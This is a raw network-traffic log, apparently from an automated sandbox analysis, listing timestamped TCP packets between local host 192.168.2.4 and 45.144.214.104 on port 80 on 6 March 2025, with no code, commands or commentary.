                              Mar 6, 2025 07:06:14.590373039 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590384007 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590420961 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590687037 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590722084 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590758085 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590791941 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590806007 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590827942 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.590838909 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.590868950 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591021061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591064930 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591074944 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591120958 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591128111 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591181993 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591237068 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591273069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591281891 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591308117 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591317892 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591344118 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591377974 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591413021 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591423988 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591448069 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.591458082 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.591485023 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592365980 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592420101 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592422962 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592458963 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592468023 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592494965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592530966 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592565060 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592576981 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592602015 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592609882 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592636108 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592674971 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592710018 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592724085 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592746019 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592755079 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.592792034 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.592959881 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593008995 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.593014956 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593051910 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593060970 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.593364000 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593400002 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593436956 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.593446016 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.593481064 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.682475090 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682580948 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682616949 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682655096 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682693005 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682727098 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682763100 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682805061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682838917 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682841063 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.682841063 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.682841063 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.682873011 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682881117 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.682908058 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682944059 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.682981014 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.683015108 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.683051109 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.683084965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.683104038 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.683104038 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.683104992 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.683121920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.683182001 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721265078 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721309900 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721426964 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721465111 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721501112 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721538067 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721591949 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721597910 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721626043 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721663952 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721663952 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721663952 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721682072 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721767902 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721805096 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721839905 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721873999 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721873045 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721905947 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721908092 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721915007 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.721942902 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.721982956 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722018003 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722031116 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722053051 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722063065 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722089052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722125053 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722167969 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722194910 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722239971 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722259045 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722311974 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722352028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722388029 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722395897 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722440004 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722444057 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722481012 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722516060 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722553968 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722559929 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722585917 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722601891 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722620964 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722659111 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722701073 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722707033 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722754002 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722758055 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722846985 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722901106 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722938061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722948074 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.722975016 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.722980976 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723010063 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723046064 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723079920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723089933 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723115921 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723123074 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723150015 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723193884 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723238945 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723248005 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723303080 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723318100 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723354101 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723387957 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723422050 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723433018 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723457098 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723472118 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723494053 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723529100 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723563910 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723572016 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723611116 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723769903 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723804951 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723839045 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723886967 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723872900 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723932028 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.723941088 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.723977089 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724011898 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724047899 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724055052 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724096060 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724206924 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724273920 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724353075 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724401951 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724407911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724442959 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724456072 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724478960 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724530935 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724566936 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724577904 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724602938 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724608898 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724638939 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724674940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724709988 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724720955 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724744081 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724754095 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724778891 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724814892 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724848986 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724858046 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.724888086 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.724895000 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725164890 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725218058 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725270033 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725274086 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725306988 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725318909 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725361109 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725426912 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725461006 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725470066 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725506067 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725506067 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725560904 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725595951 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725630045 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725641966 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725667953 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725686073 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725703001 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725739956 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725774050 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725786924 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725810051 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.725816011 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.725846052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.727731943 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.769501925 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769629955 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769718885 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769758940 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769814968 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769850969 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769860029 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.769860029 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.769886017 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769921064 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769957066 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.769992113 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770028114 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770051956 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770051956 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770085096 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770102024 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770138025 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770153046 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770173073 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770207882 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770242929 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770273924 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770277977 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770301104 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770333052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770371914 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770391941 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770406008 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770442009 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770473003 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.770493984 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.770522118 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.811659098 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811717033 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811755896 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811789989 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811825991 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811862946 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.811956882 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.811958075 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.811958075 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852190971 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852243900 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852283001 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852343082 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852381945 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852417946 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852435112 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852435112 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852457047 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852694035 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852732897 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852823973 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852879047 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852879047 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852917910 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.852930069 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.852953911 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853009939 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853046894 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853056908 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853091955 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853100061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853136063 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853188038 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853235960 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853239059 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853275061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853306055 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853308916 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853344917 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853379011 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853391886 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853418112 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853424072 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853452921 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853487968 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853530884 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853533983 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853583097 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853583097 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853617907 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853672028 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853722095 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853737116 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853759050 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853770018 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853795052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853831053 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853883028 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.853885889 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853921890 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.853939056 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854033947 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854087114 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854121923 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854135036 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854156971 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854166031 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854197979 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854233027 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854266882 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854278088 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854301929 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854305983 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854336977 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854389906 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854424000 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854434013 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854461908 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854470968 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854515076 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854568958 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854603052 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854614973 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854640007 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854648113 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854675055 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854711056 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854746103 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854759932 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854782104 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854790926 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854816914 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854854107 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854887962 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854899883 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854923964 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854943991 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.854959965 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.854995012 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855029106 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855041981 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.855066061 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855072975 CET4973380192.168.2.445.144.214.104
                              Mar 6, 2025 07:06:14.855102062 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855137110 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855171919 CET804973345.144.214.104192.168.2.4
                              Mar 6, 2025 07:06:14.855192900 CET4973380192.168.2.445.144.214.104
